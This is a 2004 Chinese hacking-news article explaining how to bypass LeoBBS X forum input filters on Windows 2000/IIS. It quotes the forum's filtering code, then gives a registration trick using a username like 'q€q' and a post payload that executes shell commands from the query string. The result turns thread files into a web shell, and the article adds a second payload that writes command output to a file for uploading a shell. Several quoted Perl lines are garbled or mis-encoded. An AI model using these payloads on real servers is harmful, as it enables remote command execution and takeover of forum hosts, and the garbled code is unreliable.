雷傲论坛过滤不严漏洞 -pc6资讯

您的位置：首页 → 网络冲浪 → 黑客天空 → 雷傲论坛过滤不严漏洞

雷傲论坛过滤不严漏洞 时间：2004/10/8 16:39:00来源：本站整理作者：蓝点我要评论(0)

[zt]雷傲论坛过滤不严漏洞

第一次写这些东西，欢迎大家拍砖~

适用版本 leoBBS X 论坛一般都存在的漏洞（测试了几个，都有的）~
适用系统 win2000+ iis
cgi 解析方式 perl.exe %s %s ,perlis.dll

漏洞原理：
利用了对用户输入的过滤不严，编写代码，从而获得shell。
结合利用register.cgi 和post.cgi 过滤不严。

1、看下lb 论坛的register.cgi注册中的过滤，

for ('inmembername'...)
$tp = $query->param($_);
$tp = &unHTML("$tp");
${$_} = $tp;
}

sub unHTML {} 里面的东西不重要。

&error("用户注册&对不起，您输入的用户名有问题，请不要在用户名中包含\@\#\$\%\^\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]这类字符！") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/);
if($inmembername =~ /_/) { &error("用户注册&请不要在用户名中使用下划线！"); }

$inmembername =~ s/\ \;//ig;
$inmembername =~ s/　/ /g;
$inmembername =~ s// /g;
$inmembername =~ s/[ ]+/ /g;
$inmembername =~ s/[ ]+/_/;
$inmembername =~ s/[_]+/_/;
$inmembername =~ s/�//isg;
$inmembername =~ s///isg;
$inmembername =~ s/　//isg;
$inmembername =~ s///isg;
$inmembername =~ s/()+//isg;
$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
$inmembername =~ s/\s*$//g;
$inmembername =~ s/^\s*//g;

&error("用户注册&对不起，您输入的用户名有问题") if ($inmembername =~ /^q(.+?)-/ig);

$inmembername =~ /guest/i)||($inmembername =~ /qq-/i)||($inmembername =~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =~ /qw-/i)||($inmembername =~ /qr-/i)||($inmembername =~ /no)||($inmembername eq "admin")||($inmembername display/i)||($inmembername =~ /^system/i)||($inmembername =~ /---/ieq "root")||($inmembername eq "copy")||($inmembername =~ /^sub/)||($inmembername =~ /^exec/)||($inmembername =~ /\@ARGV/i)||($inmembername =~ /^require/)||($inmembername =~ /^rename/i)||($inmembername =~ /^dir/i)||($inmembername =~ /^print/i)||($inmembername =~ /^con/i)||($inmembername =~ /^nul/i)||($inmembername =~ /^aux/i)||($inmembername =~ /^com/i)||($inmembername =~ /^lpt/i));

等等。

过滤的挺彻底的哦~

但是忽略了 q及 qq、qw等的运用还可以用些特殊的符号的：馐亲罟丶囊徊健?br />
2、再看下post.cgi里对发贴的过滤

for ('forum','topic','membername','password','action','postno','inshowsignature',
'notify','inshowemoticons','intopictitle','inshowchgfont',
'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') {
next unless defined $_;
next if $_ eq 'SEND_MAIL';
$tp = $query->param($_);
$tp = &cleaninput("$tp");
${$_} = $tp;
}

sub cleaninput {
my ($self, $text) = _self_or_default(@_);
# my $text = shift;
study($text);
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/\ / /g;
$text =~ s/\@ARGV/\&\#64\;ARGV/isg;
$text =~ s/\;/\&\#59\;/isg;
$text =~ s/\&/\&/g;
$text =~ s/\&\#/\&\#/isg;
$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;
$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/$text =~ s/>/\>/g;
$text =~ s/ / /g;
$text =~ s/\n\n/

/g;
$text =~ s/\n/
/g;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
$text =~ s/'/\&\#039\;/g;
$text =~ s/#/#/isg;
$text =~ s/&#/&#/isg;
return $text;
}

只要编写的代码饶过上面的过滤能运行，就可以的。

3、如此针对win2000的机子可以有下面的方法取的shell的
用perl.exe 解析的话

用 q€q 为用户名注册 € 后面随意写，自然也可以用别的符号的，
他可不是用 s/\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
~ /^q(.+?)-/ig

($inmembername =~ /qq-/i)||($inmembername =~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =~ /qw-/i)||($inmembername =~ /qr-/i)
就能全部过滤掉的：）。

接着只要在发贴的内容中写入

€ and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

该forum下*.thd.cgi 就是个简单的shell了。

用 perlis.dll解析的话，构造好的话，也能实现目的的。（试了下，可以用
€ and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1|256)and print AA @s
(由于过滤了 >,这个想了好久，可能你会有更好的方法的。）能看到会员等目录的，想执行别的命令，修改$cmd就可以了；改后缀名上传个shell，然后改回来就可以获得shell了。

文章评论

查看所有0条评论>>

热门文章 黑客大战直播网址黑客